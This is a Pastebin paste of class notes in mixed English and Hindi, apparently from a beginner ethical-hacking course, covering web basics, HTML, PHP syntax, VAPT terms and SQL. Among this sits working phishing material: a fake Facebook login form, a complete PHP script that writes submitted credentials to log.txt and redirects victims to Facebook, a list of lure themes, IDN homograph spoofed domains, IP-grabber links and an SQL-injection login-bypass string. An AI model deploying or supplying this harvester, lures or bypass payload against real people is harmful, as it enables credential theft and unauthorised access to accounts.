Advertisement
LuciferAviSonicX

Weekend batch day 3

Sep 3rd, 2017
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.96 KB | None | 0 0
  1. WebTechnologies And Basic Components
  2. ------------------------------------
  3. 1. Domain Name
  4. 2. Hosting
  5. 3. Server
  6. 4. Database
  7. 5. Technologies ----> HTML, PHP, JAVASCRIPT
  8.  
  9. --->Domin Name----> It is the name of the website that we purchase from domin name provider ----> godaddy.com, wix, 000webhost
  10.  
  11. --->Hosting -----> Place where i keep the content of my website
  12.  
  13. --->Servers ----> They help in processing the request and give me response
  14.  
  15. --->Database ----> are the backbone of the web technologies.... these are used to store data in the form of tables anb columns
  16.  
  17. Technologies
  18. ------------
  19. programming and other tools which are used for building my web site
  20. php, HTML, Javascript, css, angularJS, asp .net
  21.  
  22.  
  23. webpage ---> collection of hyperlinks and hypertext
  24. website ---> collection of different web pages
  25.  
  26.  
  27. Security
  28. --------
  29. 1. ssl sertificate ---> HTTPS ---> Secure Socket Layer
  30. 2. Firewall ----> filter---> malicious data
  31. 3. IPS and IDS ----> attacker se bachati hai
  32. IPS = Intrusion Prevention Service
  33. IDS = Intrusion Detection Service
  34.  
  35. hello---> plain text
  36. algo ---> encrypt ---> secret language
  37. kijui----> cipher text ----> secret text
  38. algo ----> decryption ---> secret text ko plain text
  39. hello-----> plain text
  40.  
  41. Misconception
  42. -------------
  43. 1. HTTPS will not save you
  44. 2. Firewall can be easily bypass
  45. 3. All anti-malware can be evaded
  46.  
  47. Servers ---> Responsible for request and response
  48. -------
  49. 1. Microsoft servers ----> IIS + Apache + MSSQL ---> Paid
  50. 2. Linux Server ---> Apache + Tomcat + MySQL,SQL ---> Both, paid and open source as well
  51.  
  52.  
  53. Windows based server ----> WAMPP
  54. W ---> Windows
  55. A ---> Apache
  56. M ---> MySQL
  57. P ---> Perl
  58. P ---> php
  59.  
  60. Linux Based server ---> LAMPP
  61. L ---> Linux
  62. A ---> Apache
  63. M ---> MySQL
  64. P ---> perl
  65. P ---> PHP
  66.  
  67. Mughe nahi pta k konsa OS h ---> XAMPP
  68. X ---> Cross Platform ---> portable software server
  69. A ---> Apache
  70. M ---> MySQL
  71. P ---> perl
  72. P ---> PHP
  73.  
  74. HTML
  75. ----
  76. HyperText Markup Language
  77. <>--->tags ----> markup
  78.  
  79.  
  80.  
  81. 1. <html>****</html> ----> it defines that my whole syntax is of HTML ---> each and every content of the webpage is written between this tag
  82.  
  83. 2. <head>****</head> ----> it defines the header of the webpage
  84.  
  85. 3. <title>***</title> ---> it gives the name in the tab --> always under head tag
  86.  
  87. 4. <body>***</body>---> it define the whole content of the body---> ye head tag se bahar chalta h
  88.  
  89. 5. <p>paragraph</p> ----> it defines a paragraph in the web page
  90.  
  91. 6. <br> ---> it gives a new line to my web page.
  92.  
  93. 7. <h>****</h> ----> It is used for providing a heading to my webpage content
  94.  
  95. 8. <img src=""> ---> to insert an image into a web page
  96.  
  97. 9. <a href=""> ----> me apne data ko link provide kr rha hu
  98.  
  99. 10. <form>*****</form> ---> it will create a login type form
  100. <input> ---> different elements
  101.  
  102.  
  103. first.html
  104. <html>
  105. <head>
  106. <title>First Page</title>
  107. </head>
  108. <body>
  109. <a href="https://www.google.com/search?q=dragon+ball+z&client=ubuntu&channel=fs&tbm=isch&source=lnms&sa=X&ved=0ahUKEwjB-IXQ-vvVAhVLIlAKHXznCnYQ_AUICygC&biw=1309&bih=671&dpr=1">
  110. <h1>Dragon Ball Z</h1>
  111. </a>
  112. <a href="https://www.google.com/search?client=ubuntu&channel=fs&biw=1309&bih=671&tbm=isch&sa=1&q=lucifer+&oq=lucifer+&gs_l=psy-ab.3..0i67k1j0l2j0i67k1.31225.32550.0.33264.8.8.0.0.0.0.518.1123.2-1j1j0j1.3.0....0...1.1.64.psy-ab..5.3.1120.9VRWyWn6WqQ">
  113. <p>Hello, everyone.<br> This is my first web page.<br> My name is Lucifer Morning Star.</p>
  114. </a>
  115. <a href="https://www.google.com/search?q=goku&client=ubuntu&channel=fs&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjUxf3B-fvVAhUPU1AKHeNSD0YQ_AUICigB&biw=1309&bih=671"><img src="/home/avi_lucifer/Desktop/goku_by_bpsola-d6j32pk.jpg">
  116. </a>
  117. <p>Login Via Facebook Account</p>
  118. <form action="second.html" method="get">
  119. username : <input type="text"><br> <br>
  120. password : <input type="password"><br> <br>
  121. <input type="submit" onClick="second.html">
  122. </form>
  123. </body>
  124. </html>
  125.  
  126.  
  127. second.html
  128. <html>
  129. <head>
  130. <title>Second Page</title>
  131. </head>
  132. <body>
  133. <p> Welcome to the fake facebook</p>
  134. </body>
  135. </html>
  136.  
  137.  
  138. php----> Hypertext preprocessor
  139. -------------------------------
  140. Basics of PHP
  141. ------------------
  142. PHP is a server side language, which is used to create dynamic website.
  143. PHP variables → they are temporary memory location which holds input data.
  144. Variable name should start with $ sign.
  145. After $ sign, there is a alphabet [a-z][A-Z] or underscore(_)
  146. After that there will be a combination of alphanumeric character and underscore.
  147. Eg. $uname = “Abhijeet”
  148. $s_salary = 30000
  149.  
  150. PHP operators → they are use to manipulate data and variables.
  151. Arithmatic operator
  152. + → addition → $a + $b
  153. - → subtraction → $a - $b
  154. / → division → $a / $b → quotent
  155. * → multiplication → $a * $b
  156. % → modulus → $a % $b → remainder
  157. Assignment Operator
  158. = → asign the value → $a = 10
  159. += → $a += $b → $a = $a + $b
  160. -= → $a -= $b → $a = $a - $b
  161. *= → $a *= $b → $a = $a * $b
  162. /= → $a /= $b → $a = $a / $b
  163. %= → $a %= $b → $a = $a % $b
  164. Relational & Comparision Operator
  165. > → $a > $b
  166. < → $a < $b
  167. >= → $a >= $b
  168. <= → $a <= $b
  169. == → $a == $b
  170. != → $a != $b
  171. Logical Operator
  172. AND (&&) → when all the conditions are true, then the answer will be true.
  173. OR (||) →when any one of the condition is true then the answer is true.
  174. NOT (!) → It will reverse the value… true to false and false to true.
  175. PROGRAM
  176. ----------------
  177. <?php
  178. $a = 10;
  179. $b = 20;
  180. $sum = $a + $b;
  181. echo “The sum is ”.$sum;
  182. ?>
  183. PHP Conditional Statement → they always return some boolean value… either true or false.
  184. If | Else
  185. if($a > $b)
  186. {
  187. echo “A ig greater”;
  188. }
  189. else
  190. {
  191. echo “B is greater”;
  192. }
  193. If else if else
  194. if($a>$b && $a>$c)
  195. {
  196. echo “A ig greater”;
  197. }
  198. else if ($b>$a && $b>$c)
  199. {
  200. echo “B is greater”;
  201. }
  202. else
  203. {
  204. echo “C is greater”;
  205. }
  206. Nested If Else
  207. <?php
  208. $age = 27;
  209. $gend = “Male”;
  210. if ($age > 25)
  211. {
  212. if($gend == “Male”)
  213. {
  214. echo “Eligible”;
  215. }
  216. else
  217. {
  218. echo “Not eligible”;
  219. }
  220. }
  221. else
  222. {
  223. echo “Age is not 25 yet”;
  224. }
  225. ?>
  226. PHP Loops → Looping is a process for executing multiple statements at a single line or repetition of statement.
  227. For Loop → in this loop first condition is check and then executed. It needs three things for starting this loop → initialization, condition, iteration.
  228. for(initialization; condition; iteration)
  229. {
  230. Statements;
  231. }
  232.  
  233.  
  234. for($i = 1; $i < 10; $i++)
  235. {
  236. echo “likho <br>”;
  237. }
  238. While Loop → condition is check in the start. Return boolean value.
  239. while(condition)
  240. {
  241. Statements;
  242. Iteration;
  243. }
  244.  
  245. while($num < 5)
  246. {
  247. echo num;
  248. }
  249. PHP Form → it is something like having textbox, labels, radio buttons, check buttons, submit buttons. Wherever you can see any query form, login form, feedback form, they all use PHP form
  250. Textbox
  251. Password
  252. Radiobutton
  253. Checkbox
  254. List|Menu
  255. Textarea
  256. Filefield
  257. Submit button
  258. Reset
  259. Normal Button
  260. PHP GET|POST→
  261. GET → unsecure method, because it display the form field values in the url. Uses upto 1mb. Fast process.
  262. POST → It is secure method. Large amount of data can be send. It is a slow process.
  263.  
  264.  
  265.  
  266.  
  267.  
  268.  
  269.  
  270. tracing and tracking
  271. --------------------
  272.  
  273. tracing---> terrorist--mail--PM
  274. me tumhare ghar m bomb lga k bhag jaunga
  275. who send it---- from where he send it
  276.  
  277.  
  278. tracking---> pm ne report kri... kaha se kb and kisne bheji
  279.  
  280.  
  281. fuglikous.com
  282.  
  283. whoreadme.com
  284.  
  285.  
  286. user agent---> browsers that the person is using for surfing the internet
  287.  
  288.  
  289.  
  290. VAPT
  291. ---
  292. V = Vulnerability
  293. A = Accessment
  294. P = Penetratino
  295. T = Testing
  296.  
  297. VA+PT
  298.  
  299. VA--> we generate a report on the loopholes and weekpoint... from where we can get access of the machine or device----> vulnerabilities, loopholes, weekpoints---> not hack only report generate
  300.  
  301. PT--> Penetration Testing--> we hack into the systems and exploit them as per the VA report--> it is purely hacking
  302.  
  303.  
  304. owasp top 10
  305. ------------
  306. open web application security project
  307.  
  308.  
  309.  
  310. DBMS---> Data Base Management System
  311. database is the backbone of any website or server where my data is stored in the form of tables and column
  312.  
  313.  
  314.  
  315.  
  316.  
  317. SQL---> Structured Querry Language
  318. it is a querry language via which i can fetch the data from the databse from a specific table and a specific column---> jo mughe chahiye vhi me leke rahunga
  319.  
  320. Select trains from train_Database where source="Delhi" destication="mumbai" date="7september" class="3AC"
  321.  
  322.  
  323. DVWA--> Damm Vulnerable Web Application
  324. its a firmware/application which is used to check the skill of PT of a candidate
  325.  
  326.  
  327. when ever i create my device as a server---- i access the server from localhost or loopback address which is 127.0.0.1
  328. localhost
  329.  
  330.  
  331. varchar==> variable + character---> House number G-33, street Number &
  332.  
  333.  
  334.  
  335.  
  336. select, insert, update, delete, and, or
  337.  
  338.  
  339. sql injection--->
  340.  
  341.  
  342. Phishing
  343. --------
  344. FIsh----> we will give chara to the people and hack their data
  345.  
  346. PHISHING ---> It is a process of creating a fake web page and by that web page we can get the user's credentials....
  347.  
  348. How To Deploy It
  349. ----------------
  350. We will create an account
  351.  
  352. HTML, css, js.....
  353.  
  354.  
  355. Game Of Throne download page
  356. adult worker
  357. paytm recharge code
  358. discount coupans
  359. ola cabs free share pass
  360.  
  361.  
  362.  
  363. uthaLo.php
  364.  
  365. <?php -----> it is a php file and php script
  366. header ('Location: http://www.facebook.com'); ----> jb mera php script ka kaam khtm ho jayega tb me user ko is site p chod dunga
  367. $handle = fopen("log.txt", "a"); ------> fire create kr rha hu
  368. foreach($_POST as $variable => $value) ---> getting all the data in a loop
  369. {
  370. fwrite($handle, $variable); ---> 1 variable
  371. fwrite($handle, "="); ----> = 2
  372. fwrite($handle, $value); ----> data write 3
  373. fwrite($handle, "\r\n"); ---->4 new line
  374. }
  375. fwrite($handle, "\r\n"); --> to write a new line
  376. fclose($handle); ---> close krdo...log.txt
  377. exit; ----> kaam khtm.... location p le jao user ko
  378. ?> ---> end of php
  379.  
  380. $handle ---> variable name
  381. fopen ---> to open a file
  382.  
  383. Attribute in file
  384.  
  385. r ---> read --> sirf and sirf read kr sakta hu
  386. w ---> write --> i will create a new file, if name does not exist... else it will overwrite the old file
  387. a ---> append ---> it work just like write but it never deletes or over write the file but it will continue writing in the same file
  388.  
  389.  
  390. username=sdxjkchvs@gmail.com
  391. password=liadsjkvcabl
  392.  
  393.  
  394.  
  395. IDN Homography Attack
  396. ---------------------
  397. IDN --> Internationalized Domain Name
  398. India has many languages..... hindi and punjabi.....
  399. World has many languages----> crylic, greek, arabic, english.......
  400.  
  401. Many alphabets have same representation as that of english characters
  402. The Russian letters а, с, е, о, р, х and у
  403. identical to a, c, e, o, p, x and y.
  404. d
  405. dеерikа раdukоnе
  406.  
  407.  
  408. рауtm.com
  409.  
  410.  
  411. Ek mail aaya.... you will be dead in the evening--->
  412. i will find from where this email has been send-----> tracing
  413. now i will reply the person with a mail.... and by that mail i will try to find the person or try to gather the information ----> tracking
  414.  
  415.  
  416.  
  417. grabify ---> https://grabify.link/
  418. fuglekus ---> www.fuglekos.com/ip-grabber
  419.  
  420.  
  421. mage [goku.jpg] successfully uploaded!
  422. Folder name [2017-8-30]
  423.  
  424.  
  425. Your image 'goku.jpg'
  426. in folder '2017-8-30' has been uploaded.
  427.  
  428.  
  429.  
  430. whoreadme----> tracking
  431.  
  432.  
  433.  
  434. Plain Text ----> Hello
  435. Ciphers ---> encrypting my messages....----> aheel ----> key ---> mail
  436. key ----> decrypt
  437.  
  438.  
  439.  
  440.  
  441.  
  442.  
  443. Authentication Bypass
  444. -----------------------
  445. I will log in as the administrator and can have what ever i want to have...
  446.  
  447.  
  448. GATES ----> AND, OR
  449.  
  450.  
  451.  
  452. AND ---> if my any of the value is 0 then my answer will be 0
  453.  
  454. A AND B ANS
  455. 0 0 0
  456. 0 1 0
  457. 1 0 0
  458. 1 1 1
  459.  
  460. OR ---> If any of the value is 1 then answer will be 1
  461.  
  462. A OR B ANS
  463. 0 0 0
  464. 0 1 1
  465. 1 0 1
  466. 1 1 1
  467.  
  468. admin 'and' 1'or'1'='1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement